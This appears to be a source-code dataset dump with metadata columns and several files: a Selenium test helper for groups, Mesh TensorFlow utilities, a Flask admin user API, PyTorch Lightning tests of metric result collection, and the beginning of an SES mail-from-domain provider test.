hexsha stringlengths 40 40 | size int64 4 1.02M | ext stringclasses 8
values | lang stringclasses 1
value | max_stars_repo_path stringlengths 4 209 | max_stars_repo_name stringlengths 5 121 | max_stars_repo_head_hexsha stringlengths 40 40 | max_stars_repo_licenses listlengths 1 10 | max_stars_count int64 1 191k ⌀ | max_stars_repo_stars_event_min_datetime stringlengths 24 24 ⌀ | max_stars_repo_stars_event_max_datetime stringlengths 24 24 ⌀ | max_issues_repo_path stringlengths 4 209 | max_issues_repo_name stringlengths 5 121 | max_issues_repo_head_hexsha stringlengths 40 40 | max_issues_repo_licenses listlengths 1 10 | max_issues_count int64 1 67k ⌀ | max_issues_repo_issues_event_min_datetime stringlengths 24 24 ⌀ | max_issues_repo_issues_event_max_datetime stringlengths 24 24 ⌀ | max_forks_repo_path stringlengths 4 209 | max_forks_repo_name stringlengths 5 121 | max_forks_repo_head_hexsha stringlengths 40 40 | max_forks_repo_licenses listlengths 1 10 | max_forks_count int64 1 105k ⌀ | max_forks_repo_forks_event_min_datetime stringlengths 24 24 ⌀ | max_forks_repo_forks_event_max_datetime stringlengths 24 24 ⌀ | content stringlengths 4 1.02M | avg_line_length float64 1.07 66.1k | max_line_length int64 4 266k | alphanum_fraction float64 0.01 1 |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
e21aa74fdbc519bddd054790b999af21ad2cf48d | 4,183 | py | Python | fixture/group.py | rooksever/python_training_skiba | be861d72d6f07fa1565ed12b97f6d4f04e6be1dc | [
"Apache-2.0"
] | null | null | null | fixture/group.py | rooksever/python_training_skiba | be861d72d6f07fa1565ed12b97f6d4f04e6be1dc | [
"Apache-2.0"
] | null | null | null | fixture/group.py | rooksever/python_training_skiba | be861d72d6f07fa1565ed12b97f6d4f04e6be1dc | [
"Apache-2.0"
] | null | null | null | from model.group import Group
class GroupHelper:
def __init__(self, app):
self.app = app
def open_groups_page(self):
wd = self.app.wd
if not (wd.current_url.endswith("/group.php") and len(wd.find_elements_by_name("new")) > 0):
wd.find_element_by_link_text("groups").click()
def create(self, group):
wd = self.app.wd
self.open_groups_page()
# init group creation
wd.find_element_by_name("new").click()
self.fill_group_form(group)
# submit group creation
wd.find_element_by_name("submit").click()
self.return_to_groups_page()
self.group_cache = None
def delete_group_by_index(self, index):
wd = self.app.wd
self.open_groups_page()
# select first group
self.select_group_by_index(index)
# submit deletion
wd.find_element_by_name("delete").click()
self.return_to_groups_page()
self.group_cache = None
def select_group_by_index(self, index):
wd = self.app.wd
wd.find_elements_by_name("selected[]")[index].click()
def select_group_by_id(self, id):
wd = self.app.wd
wd.find_element_by_css_selector("input[value='%s']" % id).click()
def delete_first_group(self):
self.delete_group_by_index(0)
def edit_first_group(self, group):
wd = self.app.wd
self.open_groups_page()
self.select_first_group()
wd.find_element_by_name("edit").click()
# edit group
self.fill_group_form(group)
# submit group edit
wd.find_element_by_name("update").click()
self.return_to_groups_page()
self.group_cache = None
def select_first_group(self):
wd = self.app.wd
wd.find_element_by_name("selected[]").click()
def return_to_groups_page(self):
wd = self.app.wd
if not (wd.current_url.endswith("/group.php") and len(wd.find_elements_by_name("new")) > 0):
wd.find_element_by_link_text("group page").click()
def fill_group_form(self, group):
wd = self.app.wd
self.change_field_value("group_name", group.name)
self.change_field_value("group_header", group.header)
self.change_field_value("group_footer", group.footer)
def change_field_value(self, field_name, text):
wd = self.app.wd
if text is not None:
wd.find_element_by_name(field_name).click()
wd.find_element_by_name(field_name).clear()
wd.find_element_by_name(field_name).send_keys(text)
def modify_group_by_index(self, index, new_group_data):
wd = self.app.wd
self.open_groups_page()
self.select_group_by_index(index)
# open modification page
wd.find_element_by_name("edit").click()
# fill group form
self.fill_group_form(new_group_data)
# submit modification
wd.find_element_by_name("update").click()
self.return_to_groups_page()
self.group_cache = None
def modify_first_group(self):
self.modify_group_by_index(0)
def count_groups(self):
wd = self.app.wd
self.open_groups_page()
return len(wd.find_elements_by_name("selected[]"))
group_cache = None
def get_group_list(self):
if self.group_cache is None:
wd = self.app.wd
self.open_groups_page()
self.group_cache = []
# to check elements on page use: $$('css_selector_name(span.group)_') in Console folder of page inspector
for element in wd.find_elements_by_css_selector("span.group"):
text = element.text
id = element.find_element_by_name("selected[]").get_attribute("value")
self.group_cache.append(Group(name=text, id=id))
return list(self.group_cache)
def delete_group_by_id(self, id):
wd = self.app.wd
self.open_groups_page()
# select first group
self.select_group_by_id(id)
# submit deletion
wd.find_element_by_name("delete").click()
self.return_to_groups_page()
self.group_cache = None
| 33.464 | 117 | 0.634951 |
7a9f8b863701a4411fbf87fb790b83e1720ae23c | 4,790 | py | Python | mesh_tensorflow/utils.py | VonRosenchild/mesh | d26470554e086ea02e64154194097fbf517232bd | [
"Apache-2.0"
] | 1 | 2019-10-10T06:06:48.000Z | 2019-10-10T06:06:48.000Z | mesh_tensorflow/utils.py | HubBucket-Team/mesh | d26470554e086ea02e64154194097fbf517232bd | [
"Apache-2.0"
] | null | null | null | mesh_tensorflow/utils.py | HubBucket-Team/mesh | d26470554e086ea02e64154194097fbf517232bd | [
"Apache-2.0"
] | 1 | 2019-10-10T06:06:50.000Z | 2019-10-10T06:06:50.000Z | # coding=utf-8
# Copyright 2019 The Mesh TensorFlow Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Common utilities for Mesh TensorFlow."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import contextlib
import heapq
import tensorflow.compat.v1 as tf
from tensorflow.python.framework import ops # pylint: disable=g-direct-tensorflow-import
@contextlib.contextmanager
def outside_all_rewrites():
with ops.control_dependencies(None):
yield
class BalancedVariablePlacer(object):
"""Place the variable on different device and balance the memory usage."""
def __init__(self, devices, init_usage=None):
init_usage = init_usage if init_usage else [0] * len(devices)
assert len(devices) == len(init_usage)
self._mem_device_heap = list(zip(init_usage, devices))
heapq.heapify(self._mem_device_heap)
self._last_device = devices[0]
def device_function(self, var):
"""Choose a device for the input variable.
Args:
var: an Variable.
Returns:
The device for placing the var.
"""
if var.type not in ('Variable', 'VariableV2', 'VarHandleOp'):
tf.logging.debug('Place {} on last device: {}.'.format(
var.name, self._last_device))
return self._last_device
shape = tf.TensorShape(var.get_attr('shape'))
assert shape.num_elements() is not None
size = var.get_attr('dtype').size
mem, device = heapq.heappop(self._mem_device_heap)
mem += shape.num_elements() * size
heapq.heappush(self._mem_device_heap, (mem, device))
tf.logging.debug('Place variable {} on {} and consumes {} Bytes.'.format(
var.name, device, mem))
self._last_device = device
return device
SCALAR_SUMMARIES_COLLECTION_KEY = 'mtf_scalar_summaries'
def create_host_call(model_dir):
"""Construct a host_call writing scalar summaries.
Borrowed from t2t.
TODO(noam): remove this code once there is a better way to get summaries on
TPU.
Args:
model_dir: String containing path to train
Returns:
(fn, args) Pair to be called by TPUEstimator as the host_call.
"""
graph = tf.get_default_graph()
# a list of (name, lowered tensor) tuples
summaries = graph.get_collection(SCALAR_SUMMARIES_COLLECTION_KEY)
def maybe_cast(tensor):
assert tensor.shape.is_compatible_with([]), tensor.name
if tensor.dtype == tf.int64:
return tf.to_int32(tensor)
if tensor.dtype == tf.bfloat16:
return tf.cast(tensor, tf.float32)
return tensor
reshaped_tensors = [tf.reshape(maybe_cast(t), [1]) for _, t in summaries]
# When no supported summaries are found, don't create host_call. Otherwise,
# TPU outfeed queue would enqueue global_step while host_call doesn't dequeue
# it, eventually causing hang.
if not reshaped_tensors:
return None
def host_call_fn(global_step, *args):
"""Training host call. Creates scalar summaries for training metrics."""
# This function is executed on the CPU and should not directly reference
# any Tensors in the rest of the `model_fn`. To pass Tensors from the
# model to the `model_fn`, provide as part of the `host_call`.
global_step = tf.cast(global_step[0], tf.int64)
with tf.summary.create_file_writer(model_dir).as_default():
# We cannot directly use any tensor from summaries, because each
# tensor here must be a concat of multiple tensors from all shards.
# Therefore, we rely on the assumption that args wil have the same
# length as summaries, and all tensors in args will have the same
# order of self._tup_summaries.
assert len(args) == len(summaries)
for i, tensor in enumerate(args):
name = summaries[i][0]
tf.summary.scalar(
name, tf.reduce_mean(tensor), step=global_step)
return tf.summary.all_v2_summary_ops()
global_step_t = tf.reshape(tf.to_int32(tf.train.get_global_step()), [1])
return host_call_fn, [global_step_t] + reshaped_tensors
def remove_summaries():
"""Remove summaries from the default graph."""
g = tf.get_default_graph()
key = 'mtf_scalar_summaries'
tf.logging.debug('Remove summaries %s' % str(g.get_collection(key)))
del g.get_collection_ref(key)[:]
assert not g.get_collection(key)
| 34.460432 | 89 | 0.720877 |
fc6dc3f3d385779193597c4163f8dd085bab5e48 | 2,331 | py | Python | apps/modules/user/apis/adm_user.py | worry45678/osroom | 1191e306fea5613e9b1e454c0d11662d0ed26e7a | [
"BSD-2-Clause"
] | 1 | 2020-04-03T08:01:07.000Z | 2020-04-03T08:01:07.000Z | apps/modules/user/apis/adm_user.py | dhgdhg/osroom | 4d693eaab96503cadd391bf924bffedcd931a07c | [
"BSD-2-Clause"
] | null | null | null | apps/modules/user/apis/adm_user.py | dhgdhg/osroom | 4d693eaab96503cadd391bf924bffedcd931a07c | [
"BSD-2-Clause"
] | null | null | null | #!/usr/bin/env python
# -*-coding:utf-8-*-
from flask import request
from apps.core.flask.login_manager import osr_login_required
from apps.configs.sys_config import METHOD_WARNING
from apps.core.blueprint import api
from apps.core.flask.permission import permission_required
from apps.core.flask.response import response_format
from apps.modules.user.process.adm_user import user, users, user_restore, user_activation, user_edit, user_del
from apps.core.flask.permission import permissions
__author__ = "Allen Woo"
@api.route('/admin/user', methods=['GET', 'PUT','DELETE'])
@osr_login_required
@permission_required(permissions(["USER_MANAGE"]))
def api_adm_user():
'''
GET:
1. 获取指定ID的用户基本信息
id:<str> , user id
2.分页获取所有用户
status:<str>,用户状态,"normal" or "inactive" or "cancelled"
page:<int>,第几页,默认第1页
pre:<int>, 每页查询多少条
keyword:<str>, Search keywords, 搜索的时候使用
PUT:
1.编辑用户
id:<str>, user id
role_id:<str>, role id
active:<int>, 0 or 1
2.激活或冻结用户
op:<str>, 为"activation"
active:<int>, 0 or 1, 0为冻结, 1为激活
ids:<array>
3.恢复用户,将状态改为未删除
op:<str>, 为"restore"
ids:<array>
DELETE:
删除用户,非数据库删除
ids:<array>
'''
if request.c_method == "GET":
if request.argget.all('id'):
data = user()
else:
data = users()
elif request.c_method == "PUT":
if request.argget.all('op') == "restore":
data = user_restore()
elif request.argget.all('op') == "activation":
data = user_activation()
else:
data = user_edit()
elif request.c_method == "DELETE":
data = user_del()
else:
data = {"msg_type":"w", "msg":METHOD_WARNING, "http_status":405}
return response_format(data)
@api.route('/admin/user/del', methods=['DELETE'])
@osr_login_required
@permission_required(permissions(["IMPORTANT_DATA_DEL"]))
def api_adm_user_del():
'''
DELETE:
永久删除用户,数据库中删除
ids:<array>
permanent:<int> 0 or 1, 0:非数据库删除,只是把状态改成"删除状态",为1:表示永久删除,
'''
if request.c_method == "DELETE":
data = user_del()
else:
data = {"msg_type":"w", "msg":METHOD_WARNING, "http_status":405}
return response_format(data) | 27.423529 | 110 | 0.614329 |
dd034070809539ff94eb79ecc3208ab2777d63e5 | 21,375 | py | Python | tests/core/test_metric_result_integration.py | Tshimanga/pytorch-lightning | ff7305f74d4e097a45b6a4d8c0fff6d4f5aaa386 | [
"Apache-2.0"
] | 1 | 2021-12-17T15:33:29.000Z | 2021-12-17T15:33:29.000Z | tests/core/test_metric_result_integration.py | Tshimanga/pytorch-lightning | ff7305f74d4e097a45b6a4d8c0fff6d4f5aaa386 | [
"Apache-2.0"
] | null | null | null | tests/core/test_metric_result_integration.py | Tshimanga/pytorch-lightning | ff7305f74d4e097a45b6a4d8c0fff6d4f5aaa386 | [
"Apache-2.0"
] | null | null | null | # Copyright The PyTorch Lightning team.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import os
import pickle
from contextlib import suppress
from copy import deepcopy
from unittest import mock
import pytest
import torch
import torch.distributed as dist
import torch.multiprocessing as mp
from torch.nn import ModuleDict, ModuleList
from torchmetrics import Metric, MetricCollection
import tests.helpers.utils as tutils
from pytorch_lightning import Trainer
from pytorch_lightning.callbacks import ModelCheckpoint
from pytorch_lightning.trainer.connectors.logger_connector.result import MetricSource, ResultCollection
from pytorch_lightning.utilities.imports import _fault_tolerant_training, _TORCH_GREATER_EQUAL_1_7
from tests.helpers import BoringModel
from tests.helpers.runif import RunIf
class DummyMetric(Metric):
def __init__(self):
super().__init__()
self.add_state("x", torch.tensor(0), dist_reduce_fx="sum")
def update(self, x):
self.x += x
def compute(self):
return self.x
def _setup_ddp(rank, worldsize):
import os
os.environ["MASTER_ADDR"] = "localhost"
# initialize the process group
dist.init_process_group("gloo", rank=rank, world_size=worldsize)
def _ddp_test_fn(rank, worldsize):
_setup_ddp(rank, worldsize)
torch.tensor([1.0])
metric_a = DummyMetric()
metric_b = DummyMetric()
metric_c = DummyMetric()
metric_a = metric_a.to(f"cuda:{rank}")
metric_b = metric_b.to(f"cuda:{rank}")
metric_c = metric_c.to(f"cuda:{rank}")
result = ResultCollection(True, torch.device(f"cuda:{rank}"))
for _ in range(3):
cumulative_sum = 0
for i in range(5):
metric_a(i)
metric_b(i)
metric_c(i)
cumulative_sum += i
result.log("h", "a", metric_a, on_step=True, on_epoch=True)
result.log("h", "b", metric_b, on_step=False, on_epoch=True)
result.log("h", "c", metric_c, on_step=True, on_epoch=False)
batch_log = result.metrics(True)[MetricSource.LOG]
assert batch_log == {"a_step": i, "c": i}
epoch_log = result.metrics(False)[MetricSource.LOG]
result.reset()
# assert metric state reset to default values
assert metric_a.x == metric_a._defaults["x"], (metric_a.x, metric_a._defaults["x"])
assert metric_b.x == metric_b._defaults["x"]
assert metric_c.x == metric_c._defaults["x"]
assert epoch_log == {"b": cumulative_sum * worldsize, "a_epoch": cumulative_sum * worldsize}
@RunIf(skip_windows=True, min_gpus=2)
def test_result_reduce_ddp():
"""Make sure result logging works with DDP"""
tutils.set_random_master_port()
worldsize = 2
mp.spawn(_ddp_test_fn, args=(worldsize,), nprocs=worldsize)
def test_result_metric_integration():
metric_a = DummyMetric()
metric_b = DummyMetric()
metric_c = DummyMetric()
result = ResultCollection(True, torch.device("cpu"))
for _ in range(3):
cumulative_sum = 0
for i in range(5):
metric_a(i)
metric_b(i)
metric_c(i)
cumulative_sum += i
result.log("h", "a", metric_a, on_step=True, on_epoch=True)
result.log("h", "b", metric_b, on_step=False, on_epoch=True)
result.log("h", "c", metric_c, on_step=True, on_epoch=False)
batch_log = result.metrics(True)[MetricSource.LOG]
assert batch_log == {"a_step": i, "c": i}
epoch_log = result.metrics(False)[MetricSource.LOG]
result.reset()
# assert metric state reset to default values
assert metric_a.x == metric_a._defaults["x"]
assert metric_b.x == metric_b._defaults["x"]
assert metric_c.x == metric_c._defaults["x"]
assert epoch_log == {"b": cumulative_sum, "a_epoch": cumulative_sum}
result.minimize = torch.tensor(1.0)
result.extra = {}
assert str(result) == (
"ResultCollection("
"minimize=1.0, "
"{"
"'h.a': ResultMetric('a', value=DummyMetric()), "
"'h.b': ResultMetric('b', value=DummyMetric()), "
"'h.c': ResultMetric('c', value=DummyMetric())"
"})"
)
assert repr(result) == (
"{"
"True, "
"device(type='cpu'), "
"minimize=tensor(1.), "
"{'h.a': ResultMetric('a', value=DummyMetric()), "
"'h.b': ResultMetric('b', value=DummyMetric()), "
"'h.c': ResultMetric('c', value=DummyMetric()), "
"'_extra': {}}"
"}"
)
def test_result_collection_simple_loop():
result = ResultCollection(True, torch.device("cpu"))
current_fx_name = None
batch_idx = None
def lightning_log(fx, *args, **kwargs):
nonlocal current_fx_name
if current_fx_name != fx and batch_idx in (None, 0):
result.reset(metrics=False, fx=fx)
result.log(fx, *args, **kwargs)
current_fx_name = fx
lightning_log("a0", "a", torch.tensor(0.0), on_step=True, on_epoch=True)
lightning_log("a1", "a", torch.tensor(0.0), on_step=True, on_epoch=True)
for epoch in range(2):
lightning_log("b0", "a", torch.tensor(1.0) + epoch, on_step=True, on_epoch=True)
lightning_log("b1", "a", torch.tensor(1.0) + epoch, on_step=True, on_epoch=True)
for batch_idx in range(2):
lightning_log("c0", "a", torch.tensor(2.0) + epoch, on_step=True, on_epoch=True)
lightning_log("c1", "a", torch.tensor(2.0) + epoch, on_step=True, on_epoch=True)
lightning_log("c2", "a", torch.tensor(2.0) + epoch, on_step=True, on_epoch=True)
batch_idx = None
lightning_log("d0", "a", torch.tensor(3.0) + epoch, on_step=False, on_epoch=True)
lightning_log("d1", "a", torch.tensor(3.0) + epoch, on_step=False, on_epoch=True)
for k in ("a0.a", "a1.a"):
assert result[k].value == torch.tensor(0.0), k
assert result[k].cumulated_batch_size == torch.tensor(1.0), k
for k in ("b0.a", "b1.a"):
assert result[k].value == torch.tensor(1.0) + epoch, k
assert result[k].cumulated_batch_size == torch.tensor(1.0), k
for k in ("c0.a", "c1.a", "c2.a"):
assert result[k].value == torch.tensor(4.0) + epoch * 2, k
assert result[k].cumulated_batch_size == torch.tensor(2.0), k
for k in ("d0.a", "d1.a"):
assert result[k].value == torch.tensor(3.0) + epoch, k
assert result[k].cumulated_batch_size == torch.tensor(1.0), k
def my_sync_dist(x, *_, **__):
return x
def test_result_collection_restoration(tmpdir):
"""
This test make sure metrics are properly reloaded on failure.
"""
result = ResultCollection(True, torch.device("cpu"))
metric_a = DummyMetric()
metric_b = DummyMetric()
metric_c = DummyMetric()
metric_d = DummyMetric()
current_fx_name = None
batch_idx = None
def lightning_log(fx, *args, **kwargs):
nonlocal current_fx_name
if current_fx_name != fx and batch_idx in (None, 0):
result.reset(metrics=False, fx=fx)
result.log(fx, *args, **kwargs, sync_dist_fn=my_sync_dist)
current_fx_name = fx
for epoch in range(2):
cumulative_sum = 0
for i in range(3):
a = metric_a(i)
b = metric_b(i)
c = metric_c(i)
metric_d(i)
cumulative_sum += i
metric = metric_a if i < 1 else metric_d
lightning_log("training_step", "a", metric, on_step=True, on_epoch=True, metric_attribute="metric")
lightning_log("training_step", "b", metric_b, on_step=False, on_epoch=True, metric_attribute="metric_b")
lightning_log("training_step", "c", metric_c, on_step=True, on_epoch=False, metric_attribute="metric_c")
lightning_log("training_step", "a_1", a, on_step=True, on_epoch=True)
lightning_log("training_step", "b_1", b, on_step=False, on_epoch=True)
lightning_log("training_step", "c_1", {"1": c, "2": c}, on_step=True, on_epoch=False)
batch_log = result.metrics(on_step=True)[MetricSource.LOG]
assert set(batch_log) == {"a_step", "c", "a_1_step", "c_1"}
assert set(batch_log["c_1"]) == {"1", "2"}
result_copy = deepcopy(result)
new_result = ResultCollection(True, torch.device("cpu"))
state_dict = result.state_dict()
# check the sync fn was dropped
assert "fn" not in state_dict["items"]["training_step.a"]["meta"]["_sync"]
assert not new_result.result_metrics
assert len(result.result_metrics) == 7 + epoch > 0
new_result.load_state_dict(
state_dict, metrics={"metric": metric, "metric_b": metric_b, "metric_c": metric_c}
)
# should match
assert result_copy == new_result
# the sync fn has been kept
assert result_copy["training_step.a"].meta.sync.fn == new_result["training_step.a"].meta.sync.fn
epoch_log = result.metrics(on_step=False)[MetricSource.LOG]
epoch_log_copy = result_copy.metrics(on_step=False)[MetricSource.LOG]
assert epoch_log == epoch_log_copy
lightning_log("train_epoch_end", "a", metric_a, on_step=False, on_epoch=True)
epoch_log = result.metrics(on_step=False)[MetricSource.LOG]
assert epoch_log == {
"a_1_epoch": 1,
"a_epoch": cumulative_sum,
"a": cumulative_sum,
"b": cumulative_sum,
"b_1": 1,
}
# make sure can be pickled
pickle.loads(pickle.dumps(result))
# make sure can be torch.loaded
filepath = str(tmpdir / "result")
torch.save(result, filepath)
torch.load(filepath)
# assert metric state reset to default values
result.reset()
assert metric_a.x == metric_a._defaults["x"]
assert metric_b.x == metric_b._defaults["x"]
assert metric_c.x == metric_c._defaults["x"]
batch_idx = None
@pytest.mark.parametrize("device", ("cpu", pytest.param("cuda", marks=RunIf(min_gpus=1))))
def test_lightning_module_logging_result_collection(tmpdir, device):
class LoggingModel(BoringModel):
def __init__(self):
super().__init__()
self.metric = DummyMetric()
def validation_step(self, batch, batch_idx):
v = self.metric(batch_idx)
self.log_dict({"v": v, "m": self.metric})
return super().validation_step(batch, batch_idx)
def on_save_checkpoint(self, checkpoint) -> None:
results = self.trainer._results
# simplify logic
state_dict = results.state_dict(drop_value=False)
# check device
assert results["validation_step.v"].value.device.type == device
assert state_dict["items"]["validation_step.v"]["value"].device.type == device
# sync fn should be kept
assert results["validation_step.v"].meta.sync.fn == self.trainer.training_type_plugin.reduce
# sync fn dropped from the state dict
assert "fn" not in state_dict["items"]["validation_step.v"]["meta"]["_sync"]
results.load_state_dict(state_dict)
# check device after loading
assert results["validation_step.v"].value.device.type == device
# sync fn was preserved in the original result
assert results["validation_step.v"].meta.sync.fn == self.trainer.training_type_plugin.reduce
# default sync fn
new_results = ResultCollection(False, device)
new_results.load_state_dict(state_dict, map_location="cpu")
assert new_results["validation_step.v"].meta.sync.fn is None
# check map location
assert new_results["validation_step.v"].value.device.type == "cpu"
model = LoggingModel()
ckpt = ModelCheckpoint(dirpath=tmpdir, save_on_train_epoch_end=False)
trainer = Trainer(
default_root_dir=tmpdir,
max_epochs=2,
limit_train_batches=2,
limit_val_batches=2,
callbacks=[ckpt],
gpus=1 if device == "cuda" else 0,
)
trainer.fit(model)
def test_result_collection_extra_reference():
"""Unit-test to check that the `extra` dict reference is properly set."""
rc = ResultCollection(True)
assert rc.extra is rc["_extra"]
class DummyMeanMetric(Metric):
def __init__(self):
super().__init__()
self.add_state("sum", torch.tensor(0), dist_reduce_fx=torch.sum)
self.add_state("count", torch.tensor(0), dist_reduce_fx=torch.sum)
def update(self, increment):
self.sum += increment
self.count += 1
def compute(self):
return self.sum // self.count
def __repr__(self) -> str:
return f"{self.__class__.__name__}(sum={self.sum}, count={self.count})"
def result_collection_reload(**kwargs):
"""
This test is going to validate ResultCollection is properly being reload
and final accumulation with Fault Tolerant Training is correct.
"""
if not _fault_tolerant_training():
pytest.skip("Fault tolerant not available")
num_processes = kwargs.get("gpus", 1)
class CustomException(Exception):
pass
class ExtendedBoringModel(BoringModel):
def __init__(self):
super().__init__()
self.breaking_batch_idx = 3
self.has_validated_sum = False
self.dummy_metric = DummyMeanMetric()
@property
def results(self):
return self.trainer.fit_loop._results
def training_step(self, batch, batch_idx):
# In the training step, we will accumulate metrics using batch_idx from 0 to 4
# Without failure, we would expect to get `total=10 * world_size` and `num_batches=5 * world_size`
# Therefore, compute on `epoch_end` should provide 2 as `10 / 5`.
# However, below we will simulate a failure on `batch_idx=3`.
if self.trainer.fit_loop.restarting:
self.log("tracking", batch_idx, on_step=True, on_epoch=True)
self.log("tracking_2", batch_idx, on_step=True, on_epoch=True, sync_dist=True)
self.dummy_metric(batch_idx)
self.log("tracking_metric", self.dummy_metric, on_step=True, on_epoch=True)
value = self.results["training_step.tracking_metric"].value
value_2 = self.results["training_step.tracking"].value
# On failure, the Metric states are being accumulated on rank 0 and zeroed-out on other ranks.
# The shift indicates we failed while the state was `shift=sign(is_global_zero > 0) * [0..3]`
shift = 0
if num_processes == 2:
shift = 3 if self.trainer.is_global_zero else -3
expected = sum(range(batch_idx + 1)) + shift
assert expected == value == value_2
else:
if batch_idx == self.breaking_batch_idx:
# simulate failure mid epoch
raise CustomException
self.log("tracking", batch_idx, on_step=True, on_epoch=True)
self.log("tracking_2", batch_idx, on_step=True, on_epoch=True, sync_dist=True)
self.dummy_metric(batch_idx)
self.log("tracking_metric", self.dummy_metric, on_step=True, on_epoch=True)
value = self.results["training_step.tracking"].value
assert value == sum(range(batch_idx + 1))
value = self.results["training_step.tracking_2"]
assert value == sum(range(batch_idx + 1))
return super().training_step(batch, batch_idx)
def on_epoch_end(self) -> None:
if self.trainer.fit_loop.restarting:
total = sum(range(5)) * num_processes
metrics = self.results.metrics(on_step=False)
assert self.results["training_step.tracking"].value == total
assert metrics[MetricSource.CALLBACK]["tracking"] == self.dummy_metric.compute() == 2
assert self.results["training_step.tracking_2"].value == total
assert metrics[MetricSource.CALLBACK]["tracking_2"] == self.dummy_metric.compute() == 2
self.has_validated_sum = True
model = ExtendedBoringModel()
trainer_kwargs = {"max_epochs": 1, "limit_train_batches": 5, "limit_val_batches": 0}
trainer_kwargs.update(kwargs)
trainer = Trainer(**trainer_kwargs)
with suppress(CustomException):
trainer.fit(model)
assert not model.has_validated_sum
tmpdir = (
trainer.training_type_plugin.broadcast(trainer_kwargs["default_root_dir"], 0)
if num_processes >= 2
else trainer_kwargs["default_root_dir"]
)
ckpt_path = os.path.join(tmpdir, ".pl_auto_save.ckpt")
trainer_kwargs["resume_from_checkpoint"] = ckpt_path
trainer = Trainer(**trainer_kwargs)
trainer.fit(model)
assert model.has_validated_sum
@mock.patch.dict(os.environ, {"PL_FAULT_TOLERANT_TRAINING": "1"})
@pytest.mark.skipif(not _TORCH_GREATER_EQUAL_1_7, reason="Requires at least PyTorch 1.7")
def test_result_collection_reload(tmpdir):
result_collection_reload(default_root_dir=tmpdir)
@RunIf(min_gpus=1)
@mock.patch.dict(os.environ, {"PL_FAULT_TOLERANT_TRAINING": "1"})
@pytest.mark.skipif(not _TORCH_GREATER_EQUAL_1_7, reason="Requires at least PyTorch 1.7")
def test_result_collection_reload_1_gpu_ddp(tmpdir):
result_collection_reload(default_root_dir=tmpdir, accelerator="ddp", gpus=1)
@RunIf(min_gpus=2, special=True)
@mock.patch.dict(os.environ, {"PL_FAULT_TOLERANT_TRAINING": "1"})
@pytest.mark.skipif(not _TORCH_GREATER_EQUAL_1_7, reason="Requires at least PyTorch 1.7")
def test_result_collection_reload_2_gpus(tmpdir):
result_collection_reload(default_root_dir=tmpdir, accelerator="ddp", gpus=2)
def test_metric_collections(tmpdir):
"""This test ensures the metric attribute is properly found even with complex nested metric structure"""
class TestModel(BoringModel):
def __init__(self):
super().__init__()
self.metrics_list = ModuleList([DummyMetric() for _ in range(2)])
self.metrics_dict = ModuleDict({"a": DummyMetric(), "b": DummyMetric()})
self.metrics_collection_dict = MetricCollection({"a": DummyMetric(), "b": DummyMetric()})
self.metrics_collection_dict_nested = ModuleDict(
{"a": ModuleList([ModuleDict({"b": DummyMetric()}), DummyMetric()])}
)
def training_step(self, batch, batch_idx):
loss = super().training_step(batch, batch_idx)
self.metrics_list[0](batch_idx)
self.metrics_list[1](batch_idx)
self.metrics_dict["a"](batch_idx)
self.metrics_dict["b"](batch_idx)
self.metrics_collection_dict["a"](batch_idx)
self.metrics_collection_dict["b"](batch_idx)
self.metrics_collection_dict_nested["a"][0]["b"](batch_idx)
self.metrics_collection_dict_nested["a"][1](batch_idx)
self.log("a", self.metrics_list[0])
self.log("b", self.metrics_list[1])
self.log("c", self.metrics_dict["a"])
self.log("d", self.metrics_dict["b"])
self.log("e", self.metrics_collection_dict["a"])
self.log("f", self.metrics_collection_dict["b"])
self.log("g", self.metrics_collection_dict_nested["a"][0]["b"])
self.log("h", self.metrics_collection_dict_nested["a"][1])
return loss
def on_train_epoch_end(self) -> None:
results = self.trainer.fit_loop.epoch_loop._results
assert results["training_step.a"].meta.metric_attribute == "metrics_list.0"
assert results["training_step.b"].meta.metric_attribute == "metrics_list.1"
assert results["training_step.c"].meta.metric_attribute == "metrics_dict.a"
assert results["training_step.d"].meta.metric_attribute == "metrics_dict.b"
assert results["training_step.e"].meta.metric_attribute == "metrics_collection_dict.a"
assert results["training_step.f"].meta.metric_attribute == "metrics_collection_dict.b"
assert results["training_step.g"].meta.metric_attribute == "metrics_collection_dict_nested.a.0.b"
assert results["training_step.h"].meta.metric_attribute == "metrics_collection_dict_nested.a.1"
model = TestModel()
trainer = Trainer(default_root_dir=tmpdir, max_epochs=2, limit_train_batches=2, limit_val_batches=0)
trainer.fit(model)
| 38.169643 | 116 | 0.63607 |
bb4f5863784c0167762e13d23195d3de4574f7c7 | 3,187 | py | Python | tests/test_mail_from_domain_provider.py | mvanholsteijn/cfn-ses-provider | 268f88205ddec7b4d286979834b251aa8319e430 | [
"Apache-2.0"
] | null | null | null | tests/test_mail_from_domain_provider.py | mvanholsteijn/cfn-ses-provider | 268f88205ddec7b4d286979834b251aa8319e430 | [
"Apache-2.0"
] | null | null | null | tests/test_mail_from_domain_provider.py | mvanholsteijn/cfn-ses-provider | 268f88205ddec7b4d286979834b251aa8319e430 | [
"Apache-2.0"
] | null | null | null | import uuid
import json
from mail_from_domain_provider import MailFromDomainProvider
def test_request_schema_has_correct_additional_properties():
mail_from_provider = MailFromDomainProvider()
assert "required" in mail_from_provider.request_schema
assert "Domain" in mail_from_provider.request_schema["required"]
assert "Region" in mail_from_provider.request_schema["required"]
assert "MailFromSubdomain" in mail_from_provider.request_schema["required"]
assert "properties" in mail_from_provider.request_schema
assert "MailFromSubdomain" in mail_from_provider.request_schema["properties"]
assert "BehaviorOnMXFailure" in mail_from_provider.request_schema["properties"]
def test_generate_dns_recordsets_returns_empty_when_no_subdomain():
mail_from_provider = MailFromDomainProvider()
request = Request("Create", "example.com", "")
mail_from_provider.set_request(request, {})
assert mail_from_provider.is_valid_request()
